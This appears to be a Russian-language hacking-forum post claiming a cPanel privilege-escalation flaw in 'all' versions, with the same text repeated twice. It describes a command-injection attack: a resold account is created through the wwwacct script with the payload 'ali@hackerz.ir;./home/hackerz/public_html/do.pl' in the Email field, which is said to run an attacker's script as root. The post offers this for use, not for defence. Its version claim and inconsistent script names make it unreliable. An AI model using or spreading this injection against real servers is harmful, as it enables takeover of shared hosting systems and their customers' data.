- Регистрация
- 17 Июн 2022
- Сообщения
- 4
- Реакции
- 0
- Баллы
- 0
Уязвимости CPanel
Version : ALL !!
Risk : Very high
Что вы можете сделать с этой ошибкой:
у вас может быть доступ ко всем серверам с правами реселлера (Th3 r00t)
как это работает?
когда вы хотите создать учетную запись в оболочке, что произойдет?
./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
вы можете запустить его с правами веб-сервера! ( cpanel : doamin:2086)
привем :
http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
значит у вас есть доступ к wwwacct в папке со скриптами (Th3 r00t)
так что вы можете запустить другую команду с root-доступом, как это
./scripts/wwwactt domain.com domain password ali@hackerz.ir;./home/hackerz/public_html/do.pl
( ваша команда ./home/hackerz/public_html/do.pl)
вы можете также запустить его в базовой веб-программе. что вам нужно сделать, это просто написать ali@hackerz.ir;./home/hackerz/public_html/do.pl в поле Email когда вы создаете аккаунт.
Version : ALL !!
Risk : Very high
Что вы можете сделать с этой ошибкой:
у вас может быть доступ ко всем серверам с правами реселлера (Th3 r00t)
как это работает?
когда вы хотите создать учетную запись в оболочке, что произойдет?
./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
вы можете запустить его с правами веб-сервера! ( cpanel : doamin:2086)
привем :
http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
значит у вас есть доступ к wwwacct в папке со скриптами (Th3 r00t)
так что вы можете запустить другую команду с root-доступом, как это
./scripts/wwwactt domain.com domain password ali@hackerz.ir;./home/hackerz/public_html/do.pl
( ваша команда ./home/hackerz/public_html/do.pl)
вы можете также запустить его в базовой веб-программе. что вам нужно сделать, это просто написать ali@hackerz.ir;./home/hackerz/public_html/do.pl в поле Email когда вы создаете аккаунт.